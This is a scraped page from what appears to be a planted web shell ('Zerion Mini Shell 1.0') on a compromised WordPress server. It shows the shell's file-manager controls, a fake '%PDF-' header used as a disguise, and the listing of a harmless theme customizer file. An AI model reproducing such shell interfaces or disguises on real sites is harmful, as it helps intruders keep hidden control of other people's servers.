%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/qendrasteps/wp-content/themes/tm-heli/inc/customizer/header/
Upload File :
Create Path :
Current File : /var/www/html/qendrasteps/wp-content/themes/tm-heli/inc/customizer/header/side-box.php

<?php
$section  = 'header_side_box';
$priority = 1;

Kirki::add_field( 'thememove', array(
	'type'     => 'custom',
	'settings' => 'header_side_box_title_' . $priority ++,
	'section'  => $section,
	'priority' => $priority ++,
	'default'  => '<div class="group_title">' . __( 'Social Network Icons', 'tm-heli' ) . '</div>',
) );

Kirki::add_field( 'thememove', array(
	'type'     => 'toggle',
	'settings' => 'header_side_box_facebook',
	'label'    => __( 'Facebook', 'tm-heli' ),
	'section'  => $section,
	'priority' => $priority ++,
	'default'  => 1,
) );

Kirki::add_field( 'thememove', array(
	'type'     => 'toggle',
	'settings' => 'header_side_box_twitter',
	'label'    => __( 'Twitter', 'tm-heli' ),
	'section'  => $section,
	'priority' => $priority ++,
	'default'  => 1,
) );

Kirki::add_field( 'thememove', array(
	'type'     => 'toggle',
	'settings' => 'header_side_box_pinterest',
	'label'    => __( 'Pinterest', 'tm-heli' ),
	'section'  => $section,
	'priority' => $priority ++,
	'default'  => 1,
) );

Kirki::add_field( 'thememove', array(
	'type'     => 'toggle',
	'settings' => 'header_side_box_instagram',
	'label'    => __( 'Instagram', 'tm-heli' ),
	'section'  => $section,
	'priority' => $priority ++,
	'default'  => 1,
) );

Zerion Mini Shell 1.0